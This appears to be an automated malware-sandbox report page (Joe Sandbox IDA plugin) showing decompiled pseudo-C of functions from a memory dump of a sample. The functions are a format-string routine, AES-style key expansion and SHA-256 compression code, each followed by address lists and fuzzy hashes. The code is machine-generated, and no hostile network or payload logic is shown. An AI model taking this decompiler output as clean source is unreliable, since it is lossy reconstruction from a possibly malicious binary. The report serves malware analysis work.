											_t56 = _t113 >> 5;
											__eflags = _t92 & _t56;
											if((_t92 & _t56) != 0) {
												L50:
												__eflags = _t100 - 0x61;
												if(_t100 == 0x61) {
													L53:
													_t57 = 1;
													L54:
													__eflags = _t92;
													if(_t92 != 0) {
														L56:
														 *((char*)(_t121 + _t115 - 4)) = 0x30;
														__eflags = _t100 - 0x58;
														if(_t100 == 0x58) {
															L59:
															_t58 = 1;
															L60:
															__eflags = _t58;
															 *((char*)(_t121 + _t115 - 3)) = ((_t58 & 0xffffff00 | _t58 == 0x00000000) - 0x00000001 & 0x000000e0) + 0x78;
															_t115 = _t115 + 2;
															__eflags = _t115;
															L61:
															_t95 =  *((intOrPtr*)(_t119 + 0x24)) -  *((intOrPtr*)(_t119 + 0x38)) - _t115;
															__eflags = _t113 & 0x0000000c;
															if((_t113 & 0x0000000c) == 0) {
																E00B84464(_t119 + 0x448, 0x20, _t95, _t119 + 0x18);
																_t122 = _t122 + 0x10;
															}
															E00B85E83(_t119 + 0x448,  &_v8, _t115, _t119 + 0x18,  *((intOrPtr*)(_t119 + 0xc)));
															_t102 =  *(_t119 + 0x20);
															_t116 = _t119 + 0x18;
															_t67 = _t102 >> 3;
															__eflags = _t67 & 0x00000001;
															if((_t67 & 0x00000001) != 0) {
																_t104 = _t102 >> 2;
																__eflags = _t104 & 0x00000001;
																if((_t104 & 0x00000001) == 0) {
																	E00B84464(_t119 + 0x448, 0x30, _t95, _t116);
																	_t122 = _t122 + 0x10;
																}
															}
															E00B85D51(_t119, _t113, 0);
															__eflags =  *_t116;
															if( *_t116 >= 0) {
																_t71 =  *(_t119 + 0x20) >> 2;
																__eflags = _t71 & 0x00000001;
																if((_t71 & 0x00000001) != 0) {
																	E00B84464(_t119 + 0x448, 0x20, _t95, _t116);
																}
															}
															_t69 = 1;
															L70:
															return _t69;
														}
														__eflags = _t100 - 0x41;
														if(_t100 == 0x41) {
															goto L59;
														}
														_t58 = 0;
														goto L60;
													}
													__eflags = _t57;
													if(_t57 == 0) {
														goto L61;
													}
													goto L56;
												}
												__eflags = _t100 - 0x41;
												if(_t100 == 0x41) {
													goto L53;
												}
												_t57 = 0;
												goto L54;
											}
											L49:
											_t92 = 0;
											__eflags = 0;
											goto L50;
										}
										__eflags = _t100 - 0x58;
										if(_t100 != 0x58) {
											goto L49;
										}
										goto L48;
									}
									_t80 = _t113 >> 6;
									__eflags = _t92 & _t80;
									if((_t92 & _t80) == 0) {
										__eflags = _t92 & _t113;
										if((_t92 & _t113) == 0) {
											_t82 = _t113 >> 1;
											__eflags = _t92 & _t82;
											if((_t92 & _t82) == 0) {
												goto L46;
											}
											_v8 = 0x20;
											L45:
											_t115 = _t92;
											goto L46;
										}
										_v8 = 0x2b;
										goto L45;
									}
									_v8 = 0x2d;
									goto L45;
								}
								_t69 = _t92;
								goto L70;
							}
							L11:
							_t69 = 0;
							goto L70;
						}
						_t84 = _t50;
						__eflags = _t84;
						if(__eflags == 0) {
							L28:
							_push(0);
							_push(0xa);
							L29:
							_t51 = E00B85993(_t119, _t114, __eflags);
							goto L10;
						}
						__eflags = _t84 - 3;
						if(__eflags != 0) {
							goto L11;
						}
						_push(0);
						L13:
						_push(0x10);
						goto L29;
					}
					if(__eflags == 0) {
						_t51 = E00B85B70(__ecx);
						goto L10;
					}
					__eflags = _t49 - 0x67;
					if(_t49 <= 0x67) {
						L30:
						_t51 = E00B8559F(_t92, _t119, _t112);
						goto L10;
					}
					__eflags = _t49 - 0x69;
					if(_t49 == 0x69) {
						L27:
						_t2 = _t119 + 0x20;
						 *_t2 =  *(_t119 + 0x20) | 0x00000010;
						__eflags =  *_t2;
						goto L28;
					}
					__eflags = _t49 - 0x6e;
					if(_t49 == 0x6e) {
						_t51 = E00B85ADD(__ecx, _t112);
						goto L10;
					}
					__eflags = _t49 - 0x6f;
					if(_t49 != 0x6f) {
						goto L11;
					}
					_t51 = E00B85B51(__ecx);
					goto L10;
				}
				if(_t124 == 0) {
					goto L27;
				}
				_t125 = _t49 - 0x58;
				if(_t125 > 0) {
					_t86 = _t49 - 0x5a;
					__eflags = _t86;
					if(_t86 == 0) {
						_t51 = E00B854D9(__ecx);
						goto L10;
					}
					_t87 = _t86 - 7;
					__eflags = _t87;
					if(_t87 == 0) {
						goto L30;
					}
					__eflags = _t87;
					if(__eflags != 0) {
						goto L11;
					}
					L17:
					_t51 = E00B8586B(_t92, _t119, __eflags, 0);
					goto L10;
				}
				if(_t125 == 0) {
					_push(1);
					goto L13;
				}
				if(_t49 == 0x41) {
					goto L30;
				}
				if(_t49 == 0x43) {
					goto L17;
				}
				if(_t49 <= 0x44) {
					goto L11;
				}
				if(_t49 <= 0x47) {
					goto L30;
				}
				if(_t49 != 0x53) {
					goto L11;
				}
				goto L9;
			}

0x00b84f9f
0x00b84fa2
0x00b84fa6
0x00b84fa9
0x00b84fad
0x00b84fb0
0x00b8501e
0x00b85021
0x00b85070
0x00b85070
0x00b85073
0x00b84fe0
0x00b84fe2
0x00b84fe7
0x00b84fe9
0x00b8508e
0x00b85092
0x00b8509b
0x00b850a0
0x00b850a1
0x00b850a5
0x00b850a7
0x00b850ac
0x00b850af
0x00b850b1
0x00b850da
0x00b850da
0x00b850dd
0x00b850e0
0x00b850e7
0x00b850e9
0x00b850ec
0x00b850ee
0x00b850f2
0x00b850f2
0x00b850f5
0x00b85100
0x00b85100
0x00b85102
0x00b85102
0x00b85104
0x00b8510a
0x00b8510a
0x00b8510f
0x00b85112
0x00b8511d
0x00b8511d
0x00b8511f
0x00b8511f
0x00b8512a
0x00b8512e
0x00b8512e
0x00b85131
0x00b85137
0x00b85139
0x00b8513c
0x00b8514c
0x00b85151
0x00b85151
0x00b85166
0x00b8516b
0x00b8516e
0x00b85173
0x00b85176
0x00b85178
0x00b8517a
0x00b8517d
0x00b85180
0x00b8518d
0x00b85192
0x00b85192
0x00b85180
0x00b85199
0x00b8519e
0x00b851a1
0x00b851a6
0x00b851a9
0x00b851ab
0x00b851b8
0x00b851bd
0x00b851ab
0x00b851c0
0x00b851c3
0x00b851c8
0x00b851c8
0x00b85114
0x00b85117
0x00000000
0x00000000
0x00b85119
0x00000000
0x00b85119
0x00b85106
0x00b85108
0x00000000
0x00000000
0x00000000
0x00b85108
0x00b850f7
0x00b850fa
0x00000000
0x00000000
0x00b850fc
0x00000000
0x00b850fc
0x00b850f0
0x00b850f0
0x00b850f0
0x00000000
0x00b850f0
0x00b850e2
0x00b850e5
0x00000000
0x00000000
0x00000000
0x00b850e5
0x00b850b5
0x00b850b8
0x00b850ba
0x00b850c2
0x00b850c4
0x00b850ce
0x00b850d0
0x00b850d2
0x00000000
0x00000000
0x00b850d4
0x00b850d8
0x00b850d8
0x00000000
0x00b850d8
0x00b850c6
0x00000000
0x00b850c6
0x00b850bc
0x00000000
0x00b850bc
0x00b85094
0x00000000
0x00b85094
0x00b84fef
0x00b84fef
0x00000000
0x00b84fef
0x00b8507a
0x00b8507a
0x00b8507d
0x00b8504f
0x00b8504f
0x00b85050
0x00b85052
0x00b85054
0x00000000
0x00b85054
0x00b8507f
0x00b85082
0x00000000
0x00000000
0x00b85088
0x00b84ff7
0x00b84ff7
0x00000000
0x00b84ff7
0x00b85023
0x00b85066
0x00000000
0x00b85066
0x00b85025
0x00b85028
0x00b8505b
0x00b8505d
0x00000000
0x00b8505d
0x00b8502a
0x00b8502d
0x00b8504b
0x00b8504b
0x00b8504b
0x00b8504b
0x00000000
0x00b8504b
0x00b8502f
0x00b85032
0x00b85044
0x00000000
0x00b85044
0x00b85034
0x00b85037
0x00000000
0x00000000
0x00b8503b
0x00000000
0x00b8503b
0x00b84fb2
0x00000000
0x00000000
0x00b84fb8
0x00b84fbb
0x00b84ffb
0x00b84ffb
0x00b84ffe
0x00b85017
0x00000000
0x00b85017
0x00b85000
0x00b85000
0x00b85003
0x00000000
0x00000000
0x00b85006
0x00b85009
0x00000000
0x00000000
0x00b8500b
0x00b8500e
0x00000000
0x00b8500e
0x00b84fbd
0x00b84ff6
0x00000000
0x00b84ff6
0x00b84fc2
0x00000000
0x00000000
0x00b84fcb
0x00000000
0x00000000
0x00b84fd0
0x00000000
0x00000000
0x00b84fd5
0x00000000
0x00000000
0x00b84fde
0x00000000
0x00000000
0x00000000

Memory Dump Source

Source File: 00000000.00000002.268617007.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000000.00000002.268588954.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.269911240.0000000000B93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270395727.0000000000BC3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b60000_1JCAVkYU3U.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5deea3b29f66a918188f7a75532971316276c2599c24e1ebb0fa75850081f94e
Instruction ID: 3d85a49fe8e5575c57bcf18d82f1a7ccbc0d7004befea5c506f3448a1a44404b
Opcode Fuzzy Hash: 5deea3b29f66a918188f7a75532971316276c2599c24e1ebb0fa75850081f94e
Instruction Fuzzy Hash: 89517B60204F4557DF347A28859ABBF23C5DB11304F1809DEE987DB2B2C705ED45C3A1

Uniqueness

Uniqueness Score: -1.00%

Function 00B6EFE2 Relevance: .2, Instructions: 161
COMMONCrypto

Download Yara Rule

C-Code - Quality: 97%

			E00B6EFE2(intOrPtr __ecx, char _a4) {
				char _v12;
				signed int _v13;
				signed int _v14;
				signed int _v15;
				signed int _v16;
				signed char _v17;
				signed char _v18;
				signed char _v19;
				signed char _v20;
				char _v28;
				signed int _v29;
				signed int _v30;
				signed int _v31;
				signed int _v32;
				signed int* _v36;
				signed int _v40;
				char _v44;
				intOrPtr _v48;
				signed int _t94;
				signed int _t113;
				signed int _t116;
				signed int _t117;
				signed char _t120;
				signed int* _t121;
				signed int* _t122;
				signed int _t123;
				signed int* _t124;
				signed int _t125;
				signed int _t126;
				signed int _t127;
				signed int* _t128;
				void* _t130;
				signed int _t131;
				void* _t132;
				signed int _t134;
				signed int* _t139;
				signed int* _t142;
				void* _t145;
				void* _t167;

				_t134 = _a4 - 6;
				_v48 = __ecx;
				_v40 = _t134;
				_t94 = E00B80320( &_v32, _a4, 0x20);
				_t145 =  &_v48 + 0xc;
				_t117 = 0;
				_t126 = 0;
				_t127 = 0;
				if(_t134 <= 0) {
					L10:
					if(_t117 <= _a4) {
						_t128 = 0xb9e198;
						do {
							_t120 = _v32 ^  *(( *(_t145 + 0x1d + _t134 * 4) & 0x000000ff) + 0xb9e098);
							_v32 = _t120;
							_v31 = _v31 ^  *(( *(_t145 + 0x1e + _t134 * 4) & 0x000000ff) + 0xb9e098);
							_v30 = _v30 ^  *(( *(_t145 + 0x1f + _t134 * 4) & 0x000000ff) + 0xb9e098);
							_v29 = _v29 ^  *(( *(_t145 + 0x1c + _t134 * 4) & 0x000000ff) + 0xb9e098);
							_t94 =  *_t128 ^ _t120;
							_v32 = _t94;
							_v36 =  &(_t128[0]);
							if(_t134 == 8) {
								_t121 =  &_v28;
								_v44 = 3;
								do {
									_t130 = 4;
									do {
										 *_t121 =  *_t121 ^  *(_t121 - 4);
										_t121 =  &(_t121[0]);
										_t130 = _t130 - 1;
									} while (_t130 != 0);
									_t55 =  &_v44;
									 *_t55 = _v44 - 1;
								} while ( *_t55 != 0);
								_t122 =  &_v12;
								_v44 = 3;
								_v16 = _v16 ^  *((_v20 & 0x000000ff) + 0xb9e098);
								_v15 = _v15 ^  *((_v19 & 0x000000ff) + 0xb9e098);
								_v14 = _v14 ^  *((_v18 & 0x000000ff) + 0xb9e098);
								_v13 = _v13 ^  *((_v17 & 0x000000ff) + 0xb9e098);
								do {
									_t131 = 4;
									do {
										_t94 =  *((intOrPtr*)(_t122 - 4));
										 *_t122 =  *_t122 ^ _t94;
										_t122 =  &(_t122[0]);
										_t131 = _t131 - 1;
									} while (_t131 != 0);
									_t76 =  &_v44;
									 *_t76 = _v44 - 1;
								} while ( *_t76 != 0);
								goto L28;
							} else {
								if(_t134 > 1) {
									_t124 =  &_v28;
									_v44 = _t134 - 1;
									do {
										_t132 = 4;
										do {
											_t94 =  *((intOrPtr*)(_t124 - 4));
											 *_t124 =  *_t124 ^ _t94;
											_t124 =  &(_t124[0]);
											_t132 = _t132 - 1;
										} while (_t132 != 0);
										_t50 =  &_v44;
										 *_t50 = _v44 - 1;
									} while ( *_t50 != 0);
								}
								_t131 = 0;
								if(_t134 <= 0) {
									L37:
									_t167 = _t117 - _a4;
								} else {
									L28:
									while(_t117 <= _a4) {
										if(_t131 < _t134) {
											_t139 =  &(( &_v32)[_t131]);
											while(_t126 < 4) {
												_t123 = _t126 + _t117 * 4;
												_t113 =  *_t139;
												_t131 = _t131 + 1;
												_t139 =  &_a4;
												_t126 = _t126 + 1;
												 *(_v48 + 0x18 + _t123 * 4) = _t113;
												_t134 = _v40;
												if(_t131 < _t134) {
													continue;
												}
												break;
											}
										}
										if(_t126 == 4) {
											_t117 = _t117 + 1;
										}
										_t90 = _t126 - 4; // -4
										_t94 =  ~_t90;
										asm("sbb eax, eax");
										_t126 = _t126 & _t94;
										if(_t131 < _t134) {
											continue;
										} else {
											goto L37;
										}
										goto L38;
									}
								}
							}
							L38:
							_t128 = _v36;
						} while (_t167 <= 0);
					}
				} else {
					while(_t117 <= _a4) {
						if(_t127 < _t134) {
							_t142 =  &(( &_v32)[_t127]);
							while(_t126 < 4) {
								_t125 = _t126 + _t117 * 4;
								_t116 =  *_t142;
								_t127 = _t127 + 1;
								_t142 =  &_a4;
								_t126 = _t126 + 1;
								 *(_v48 + 0x18 + _t125 * 4) = _t116;
								_t134 = _v40;
								if(_t127 < _t134) {
									continue;
								}
								break;
							}
						}
						if(_t126 == 4) {
							_t117 = _t117 + 1;
						}
						_t18 = _t126 - 4; // -4
						_t94 =  ~_t18;
						asm("sbb eax, eax");
						_t126 = _t126 & _t94;
						if(_t127 < _t134) {
							continue;
						} else {
							goto L10;
						}
						goto L39;
					}
				}
				L39:
				return _t94;
			}

0x00b6eff8
0x00b6effb
0x00b6f000
0x00b6f004
0x00b6f009
0x00b6f00c
0x00b6f00e
0x00b6f010
0x00b6f014
0x00b6f062
0x00b6f065
0x00b6f06b
0x00b6f070
0x00b6f079
0x00b6f07f
0x00b6f08e
0x00b6f09d
0x00b6f0ac
0x00b6f0b2
0x00b6f0b5
0x00b6f0b9
0x00b6f0c0
0x00b6f0f3
0x00b6f0f7
0x00b6f0ff
0x00b6f101
0x00b6f102
0x00b6f105
0x00b6f107
0x00b6f108
0x00b6f108
0x00b6f10d
0x00b6f10d
0x00b6f10d
0x00b6f119
0x00b6f11d
0x00b6f12b
0x00b6f13a
0x00b6f149
0x00b6f158
0x00b6f15c
0x00b6f15e
0x00b6f15f
0x00b6f15f
0x00b6f162
0x00b6f164
0x00b6f165
0x00b6f165
0x00b6f16a
0x00b6f16a
0x00b6f16a
0x00000000
0x00b6f0c2
0x00b6f0c5
0x00b6f0ca
0x00b6f0ce
0x00b6f0d2
0x00b6f0d4
0x00b6f0d5
0x00b6f0d5
0x00b6f0d8
0x00b6f0da
0x00b6f0db
0x00b6f0db
0x00b6f0e0
0x00b6f0e0
0x00b6f0e0
0x00b6f0d2
0x00b6f0e7
0x00b6f0eb
0x00b6f1b9
0x00b6f1b9
0x00b6f0f1
0x00000000
0x00b6f171
0x00b6f178
0x00b6f17e
0x00b6f182
0x00b6f18b
0x00b6f18e
0x00b6f191
0x00b6f192
0x00b6f195
0x00b6f196
0x00b6f19a
0x00b6f1a0
0x00000000
0x00000000
0x00000000
0x00b6f1a0
0x00b6f1a2
0x00b6f1a9
0x00b6f1ab
0x00b6f1ab
0x00b6f1ac
0x00b6f1af
0x00b6f1b1
0x00b6f1b3
0x00b6f1b7
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00b6f1b7
0x00b6f171
0x00b6f0eb
0x00b6f1bc
0x00b6f1bc
0x00b6f1bc
0x00b6f070
0x00000000
0x00b6f016
0x00b6f021
0x00b6f027
0x00b6f02b
0x00b6f034
0x00b6f037
0x00b6f03a
0x00b6f03b
0x00b6f03e
0x00b6f03f
0x00b6f043
0x00b6f049
0x00000000
0x00000000
0x00000000
0x00b6f049
0x00b6f04b
0x00b6f052
0x00b6f054
0x00b6f054
0x00b6f055
0x00b6f058
0x00b6f05a
0x00b6f05c
0x00b6f060
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00b6f060
0x00b6f016
0x00b6f1cd
0x00b6f1cd

Memory Dump Source

Source File: 00000000.00000002.268617007.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000000.00000002.268588954.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.269911240.0000000000B93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270395727.0000000000BC3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b60000_1JCAVkYU3U.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 73519f462b74fe94c369c74ae5bcaa7361a151a2e5e51794424add7f597a2c27
Instruction ID: 8e79a34d077483bf68fd81550398db1c4c314882722870189e45202e3d31ea8c
Opcode Fuzzy Hash: 73519f462b74fe94c369c74ae5bcaa7361a151a2e5e51794424add7f597a2c27
Instruction Fuzzy Hash: 3851D2315093D69FC712CF28D14047EBFE0AE9A314F4A09EDE4D95B243C225DA4ACB62

Uniqueness

Uniqueness Score: -1.00%

Function 00B700B7 Relevance: .1, Instructions: 141
COMMONCrypto

Download Yara Rule

C-Code - Quality: 83%

			E00B700B7() {
				signed int _t81;
				signed int _t96;
				signed int _t98;
				signed int* _t99;
				unsigned int* _t100;
				void* _t101;
				unsigned int _t103;
				signed int _t108;
				unsigned int _t122;
				signed int _t124;
				signed int _t125;
				signed int* _t130;
				signed int _t131;
				signed int* _t132;
				signed int _t133;
				signed int _t140;
				void* _t146;
				void* _t147;
				void* _t148;
				signed int _t149;
				void* _t151;

				_t130 =  *(_t151 + 0x148);
				_t133 = 0;
				_t99 =  &(_t130[0xa]);
				do {
					 *((intOrPtr*)(_t151 + 0x48 + _t133 * 4)) = E00B868E4( *_t99);
					_t99 =  &(_t99[1]);
					_t133 = _t133 + 1;
				} while (_t133 < 0x10);
				_t100 = _t151 + 0x80;
				_t148 = 0x30;
				do {
					_t103 =  *(_t100 - 0x34);
					_t122 =  *_t100;
					asm("rol esi, 0xe");
					_t100 =  &(_t100[1]);
					asm("ror eax, 0x7");
					asm("rol eax, 0xd");
					asm("rol ecx, 0xf");
					_t100[1] = (_t103 ^ _t103 ^ _t103 >> 0x00000003) + (_t122 ^ _t122 ^ _t122 >> 0x0000000a) +  *((intOrPtr*)(_t100 - 0x3c)) +  *((intOrPtr*)(_t100 - 0x18));
					_t148 = _t148 - 1;
				} while (_t148 != 0);
				_t81 =  *_t130;
				_t101 = 0;
				_t108 = _t130[1];
				_t124 = _t130[2];
				_t140 = _t130[5];
				_t149 = _t130[4];
				 *(_t151 + 0x20) = _t81;
				 *(_t151 + 0x2c) = _t81;
				 *(_t151 + 0x28) = _t130[3];
				 *(_t151 + 0x10) = _t130[6];
				_t131 =  *(_t151 + 0x20);
				 *(_t151 + 0x14) = _t108;
				 *(_t151 + 0x18) = _t124;
				 *(_t151 + 0x1c) = _t140;
				 *(_t151 + 0x24) = _t130[7];
				do {
					 *(_t151 + 0x40) =  *(_t151 + 0x10);
					asm("rol eax, 0x7");
					 *(_t151 + 0x3c) = _t140;
					asm("ror esi, 0xb");
					 *(_t151 + 0x30) = _t108;
					 *(_t151 + 0x34) = _t124;
					_t125 =  *(_t151 + 0x1c);
					asm("ror eax, 0x6");
					 *(_t151 + 0x1c) = _t149;
					 *(_t151 + 0x38) = _t149;
					_t40 = _t101 + 0xb93b28; // 0x428a2f98
					_t146 = (_t149 ^ _t149 ^ _t149) + ( !_t149 &  *(_t151 + 0x10) ^ _t125 & _t149) +  *_t40 +  *((intOrPtr*)(_t151 + _t101 + 0x44));
					_t101 = _t101 + 4;
					_t147 = _t146 +  *(_t151 + 0x24);
					 *(_t151 + 0x24) =  *(_t151 + 0x10);
					_t149 =  *(_t151 + 0x28) + _t147;
					 *(_t151 + 0x10) = _t125;
					asm("rol eax, 0xa");
					asm("ror edx, 0xd");
					 *(_t151 + 0x20) = _t131;
					asm("ror eax, 0x2");
					 *(_t151 + 0x28) =  *(_t151 + 0x18);
					_t96 =  *(_t151 + 0x14);
					_t108 = _t131;
					 *(_t151 + 0x18) = _t96;
					 *(_t151 + 0x14) = _t108;
					_t131 = (_t131 ^ _t131 ^ _t131) + (( *(_t151 + 0x18) ^  *(_t151 + 0x14)) & _t131 ^  *(_t151 + 0x18) &  *(_t151 + 0x14)) + _t147;
					_t140 =  *(_t151 + 0x1c);
					_t124 = _t96;
				} while (_t101 < 0x100);
				_t98 =  *(_t151 + 0x2c) + _t131;
				_t132 =  *(_t151 + 0x148);
				_t132[1] = _t132[1] + _t108;
				_t132[2] = _t132[2] +  *(_t151 + 0x30);
				_t132[3] = _t132[3] +  *(_t151 + 0x34);
				_t132[5] = _t132[5] +  *(_t151 + 0x38);
				_t132[6] = _t132[6] +  *(_t151 + 0x3c);
				_t132[4] = _t132[4] + _t149;
				_t132[7] = _t132[7] +  *(_t151 + 0x40);
				 *_t132 = _t98;
				return _t98;
			}

0x00b700c1
0x00b700c8
0x00b700ca
0x00b700cd
0x00b700d4
0x00b700d8
0x00b700db
0x00b700dd
0x00b700e4
0x00b700eb
0x00b700ec
0x00b700ec
0x00b700f1
0x00b700f5
0x00b700f8
0x00b700fb
0x00b70109
0x00b7010c
0x00b7011e
0x00b70121
0x00b70121
0x00b70126
0x00b70128
0x00b7012a
0x00b7012d
0x00b70130
0x00b70133
0x00b70136
0x00b7013a
0x00b70141
0x00b70148
0x00b7014f
0x00b70153
0x00b70157
0x00b7015b
0x00b7015f
0x00b70163
0x00b70167
0x00b7016d
0x00b70170
0x00b70176
0x00b7017b
0x00b7017f
0x00b70185
0x00b7018b
0x00b70198
0x00b7019e
0x00b701ae
0x00b701b4
0x00b701b8
0x00b701bb
0x00b701bf
0x00b701c3
0x00b701c5
0x00b701cb
0x00b701d0
0x00b701d5
0x00b701db
0x00b701f8
0x00b701fc
0x00b70200
0x00b70202
0x00b70206
0x00b7020a
0x00b7020d
0x00b70211
0x00b70213
0x00b70223
0x00b70225
0x00b7022c
0x00b70233
0x00b7023a
0x00b70241
0x00b70248
0x00b7024b
0x00b70252
0x00b70255
0x00b70261

Memory Dump Source

Source File: 00000000.00000002.268617007.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000000.00000002.268588954.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.269911240.0000000000B93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270395727.0000000000BC3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b60000_1JCAVkYU3U.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d645111c4fec6848e58b8bf8b28d15b21d9ee8a606b0a754c0c61aa79ad0ffe1
Instruction ID: 6e39576d9461bb91643559e83ba69e4d51c489a6d04dfef3a9f39c8577e46bf5
Opcode Fuzzy Hash: d645111c4fec6848e58b8bf8b28d15b21d9ee8a606b0a754c0c61aa79ad0ffe1
Instruction Fuzzy Hash: C651D0B1A087159FC748CF19D48055AF7E1FF88314F058A2EE899E3740D734E959CB96

Uniqueness

Uniqueness Score: -1.00%

Function 00B73E0B Relevance: .1, Instructions: 112
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E00B73E0B(unsigned int __ecx) {
				intOrPtr _t39;
				signed int _t47;
				intOrPtr _t48;
				signed int _t55;
				signed int _t61;
				signed int _t66;
				intOrPtr _t78;
				signed int _t82;
				unsigned char _t84;
				signed int* _t86;
				intOrPtr _t87;
				unsigned int _t88;
				unsigned int _t89;
				signed int _t90;
				void* _t91;

				_t88 =  *(_t91 + 0x20);
				_t61 = 0;
				_t86 =  *(_t91 + 0x28);
				_t89 = __ecx;
				 *(_t91 + 0x18) = __ecx;
				_t86[3] = 0;
				if( *((intOrPtr*)(_t88 + 8)) != 0 ||  *_t88 <=  *((intOrPtr*)(__ecx + 0x84)) - 7 || E00B74E52(__ecx) != 0) {
					E00B6A881(_t88,  ~( *(_t88 + 4)) & 0x00000007);
					 *(_t91 + 0x18) = E00B6A898(_t88) >> 8;
					E00B6A881(_t88, 8);
					_t66 =  *(_t91 + 0x14) & 0x000000ff;
					_t39 = (_t66 >> 0x00000003 & 0x00000003) + 1;
					 *((intOrPtr*)(_t91 + 0x10)) = _t39;
					if(_t39 == 4) {
						goto L12;
					}
					_t86[3] = _t39 + 2;
					_t86[1] = (_t66 & 0x00000007) + 1;
					 *(_t91 + 0x20) = E00B6A898(_t88) >> 8;
					E00B6A881(_t88, 8);
					if( *((intOrPtr*)(_t91 + 0x10)) <= _t61) {
						L8:
						_t84 =  *(_t91 + 0x14);
						 *_t86 = _t61;
						if((_t61 >> 0x00000010 ^ _t61 >> 0x00000008 ^ _t61 ^ _t84 ^ 0x0000005a) !=  *((intOrPtr*)(_t91 + 0x1c))) {
							goto L12;
						}
						_t47 =  *_t88;
						_t86[2] = _t47;
						_t23 = _t47 - 1; // -1
						_t48 =  *((intOrPtr*)(_t89 + 0x88));
						_t78 = _t23 + _t61;
						if(_t48 >= _t78) {
							_t48 = _t78;
						}
						 *((intOrPtr*)(_t89 + 0x88)) = _t48;
						_t86[4] = _t84 >> 0x00000006 & 0x00000001;
						_t86[4] = _t84 >> 7;
						return 1;
					}
					_t87 =  *((intOrPtr*)(_t91 + 0x10));
					_t90 = _t61;
					do {
						_t55 = E00B6A898(_t88) >> 8 << _t90;
						_t90 = _t90 + 8;
						_t61 = _t61 + _t55;
						_t82 =  *(_t88 + 4) + 8;
						 *_t88 =  *_t88 + (_t82 >> 3);
						 *(_t88 + 4) = _t82 & 0x00000007;
						_t87 = _t87 - 1;
					} while (_t87 != 0);
					_t86 =  *(_t91 + 0x28);
					_t89 =  *(_t91 + 0x18);
					goto L8;
				} else {
					L12:
					return 0;
				}
			}

0x00b73e11
0x00b73e15
0x00b73e18
0x00b73e1c
0x00b73e1e
0x00b73e22
0x00b73e28
0x00b73e4f
0x00b73e62
0x00b73e66
0x00b73e6f
0x00b73e7a
0x00b73e7b
0x00b73e82
0x00000000
0x00000000
0x00b73e8f
0x00b73e92
0x00b73ea3
0x00b73ea7
0x00b73eb0
0x00b73eeb
0x00b73eeb
0x00b73efb
0x00b73f08
0x00000000
0x00000000
0x00b73f0a
0x00b73f0c
0x00b73f0f
0x00b73f12
0x00b73f18
0x00b73f1c
0x00b73f1e
0x00b73f1e
0x00b73f20
0x00b73f30
0x00b73f35
0x00000000
0x00b73f35
0x00b73eb2
0x00b73eb6
0x00b73eb8
0x00b73ec4
0x00b73ec6
0x00b73ecc
0x00b73ece
0x00b73ed9
0x00b73edb
0x00b73ede
0x00b73ede
0x00b73ee3
0x00b73ee7
0x00000000
0x00b73f3a
0x00b73f3a
0x00000000
0x00b73f3a

Memory Dump Source

Source File: 00000000.00000002.268617007.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000000.00000002.268588954.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.269911240.0000000000B93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270395727.0000000000BC3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b60000_1JCAVkYU3U.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 39963e26f0f32bb957082511270cc61aa548dbbc85140380b543ac3b2cb39bde
Instruction ID: 4df71d9023457c90876da50e73ee75c18eae1d98450b9367e08c4e07452457b4
Opcode Fuzzy Hash: 39963e26f0f32bb957082511270cc61aa548dbbc85140380b543ac3b2cb39bde
Instruction Fuzzy Hash: D931F5B1A147468FCB14DF28C89116ABBE0FB95704F10856DE4A9D7341C738EA0ACB91

Uniqueness

Uniqueness Score: -1.00%

